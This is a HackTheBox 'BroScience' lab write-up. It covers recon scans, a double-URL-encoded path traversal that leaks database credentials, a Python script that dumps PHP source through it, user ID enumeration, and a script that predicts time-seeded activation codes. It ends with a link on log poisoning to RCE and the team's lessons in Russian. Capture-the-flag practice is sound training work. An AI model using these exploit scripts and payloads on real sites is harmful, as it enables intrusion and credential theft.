# BroScience WriteUp [HackTheBox](https://app.hackthebox.com/machines/BroScience) `export ip=10.10.11.195` add to /etc/hosts `10.10.11.195 broscience.htb` Nmap scan ``` PORT STATE SERVICE 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA) | 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA) |_ 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519) 80/tcp open http Apache httpd 2.4.54 |_http-server-header: Apache/2.4.54 (Debian) |_http-title: Did not follow redirect to https://broscience.htb/ 443/tcp open ssl/http Apache httpd 2.4.54 ((Debian)) | ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT | Not valid before: 2022-07-14T19:48:36 |_Not valid after: 2023-07-14T19:48:36 |_http-title: BroScience : Home |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.54 (Debian) | tls-alpn: |_ http/1.1 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set ``` http port redirects us to https run sqlmap test `sqlmap https://broscience.htb/login.php --forms --crawl=1 --level=4 --risk=3 --batch --dbs` ffuf scan / with directory list 2 3 medium ``` [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 66ms] * FUZZ: images [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 108ms] * FUZZ: includes [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 98ms] * FUZZ: manual [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 129ms] * FUZZ: javascript [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 129ms] * FUZZ: styles [Status: 200, Size: 9306, Words: 3953, Lines: 147, Duration: 128ms] * FUZZ: [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 76ms] * FUZZ: server-status ``` Found interesting file in includes ![](https://i.imgur.com/hw9uwPd.png) db_connect first of all! subdomain fuzzing `ffuf -u https://broscience.htb -H "Host: FUZZ.broscience.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 90334` nothing found Notice strange file loading way :) ![](https://i.imgur.com/1eejkzL.png) Try to exploit it ![](https://i.imgur.com/z0EoOr2.png) WAF blocks us https://book.hacktricks.xyz/pentesting-web/file-inclusion https://github.com/omurugur/Path_Travelsal_Payload_List/blob/master/Payload/Dp.txt - payloads path travels Start fuzzing with the payloads (filter responses with 30 (Attack was detected) and 0 sizes) ``` wget https://github.com/omurugur/Path_Travelsal_Payload_List/raw/master/Payload/Dp.txt ffuf -u "https://broscience.htb/includes/img.php?path=FUZZ" -w Dp.txt -fs 30 -fs 0 ``` Got few positive results ![](https://i.imgur.com/WUtVKav.png) Looks like we can get files with using double url encoding (curl with --insecure tag to skip SSL checks) ![](https://i.imgur.com/LFVJ540.png) Using absolute path get creds from db_connect.php ``` ../../../../var/www/html/includes/db_connect.php curl https://broscience.htb/includes/img.php?path=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%33%25%36%63%25%37%35%25%36%34%25%36%35%25%37%33%25%32%66%25%36%34%25%36%32%25%35%66%25%36%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30 --insecure ``` ``` <?php $db_host = "localhost"; $db_port = "5432"; $db_name = "broscience"; $db_user = "dbuser"; $db_pass = "RangeOfMotion%777"; $db_salt = "NaCl"; $db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}"); if (!$db_conn) { die("<b>Error</b>: Unable to connect to database"); } ?> ``` Dump other PHP files https://stackoverflow.com/questions/67629248/how-do-i-urlencode-all-the-characters-in-a-string-including-safe-characters to encode all letters 1. Write exploit ```python= import sys import requests from urllib3 import disable_warnings from urllib3.exceptions import InsecureRequestWarning def encode_all(string): return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) disable_warnings(InsecureRequestWarning) url = 'https://broscience.htb' arr = [ 'index.php', 'user.php', 'exercise.php', 'includes/utils.php', 'includes/navbar.php', 'includes/img.php', 'includes/header.php', 'includes/db_connect.php', 'login.php', 'register.php', 'comment.php', ] root_path = '../../../../var/www/html/' if len(sys.argv) > 1: arr = sys.argv[1:] root_path = '../../../../' for path in arr: full_path = root_path + path encoded = encode_all(full_path) encoded = encode_all(encoded) print(encoded) response = requests.get(f'{url}/includes/img.php?path={encoded}', verify=False) if response.text: with open(path.split('/')[-1], 'w') as f: f.write(response.text) ``` ![](https://i.imgur.com/qzyb9IQ.png) Dump all users from site 1. generate all numbers `python -c "print('\n'.join(map(str, range(1000))))" > numbers` 2. `ffuf -u "https://broscience.htb/user.php?id=FUZZ" -w numbers -fs 1313,1309 ` (filter 'No user with that ID' and 'Empty ID value' errors) Usernames ``` admin - admin@aegjgj.com murali - murali@broscience.htb elsa - elsa@gmail.com administrator - administrator@broscience.htb bill - bill@broscience.htb michael - michael@broscience.htb john - john@broscience.htb dmytro - dmytro@broscience.htb ``` Passwords ``` RangeOfMotion%777 ``` https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet notice that code genarator random depends only of time! ![](https://i.imgur.com/zad7bM4.png) lets exploit it by generaing same code at registrating process ```python= import requests import random import string import subprocess session = requests.session() def gen_code(): generator = "gencode.php" return subprocess.check_output(['php', generator]).decode() username = ''.join([random.choice(string.ascii_letters) for _ in range(50)]) email = username + "@asd.ru" data = { "username": username, "email": email, "password": "aboba", "password-confirm": "aboba" } print(data) r = session.post('https://broscience.htb/register.php', data=data, verify=False) print(r.text) codes = gen_code().split('|') for code in codes: r = session.get(f'https://broscience.htb/activate.php?code={code}') print(r.text) ``` `gencode.php` ```php= <?php function generate_activation_code($seed) { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"; srand($seed); $activation_code = ""; for ($i = 0; $i < 32; $i++) { $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)]; } return $activation_code; } print generate_activation_code(time() - 1); print "|"; print generate_activation_code(time()); print "|"; print generate_activation_code(time() + 1); ?> ``` nice, now we have activated account ![](https://i.imgur.com/VzIeapx.png) ![](https://i.imgur.com/7UjyhF1.png) ```jsonld {'username': 'KXkIynBxmQvKFiyLXvewABkAYKPQermThiLMLqBIQHxgIVTmee', 'email': 'KXkIynBxmQvKFiyLXvewABkAYKPQermThiLMLqBIQHxgIVTmee@asd.ru', 'password': 'aboba', 'password-confirm': 'aboba'} ``` now we can sap theme ![](https://i.imgur.com/1Vr93p8.png) https://systemweakness.com/log-poisoning-to-remote-code-execution-lfi-curl-7c49be11956 ![](https://i.imgur.com/GiO2Whl.png) Выводы для нашей команды: 1. Не забывать про UDP скан 2. Обязательно строить карту сайта так как забывали файлы при дампе сорсов 3. Лучше выучить PHP 4. Внимателбно читать сорсы если они появились 5. Райтап писали хорошо, продолжать также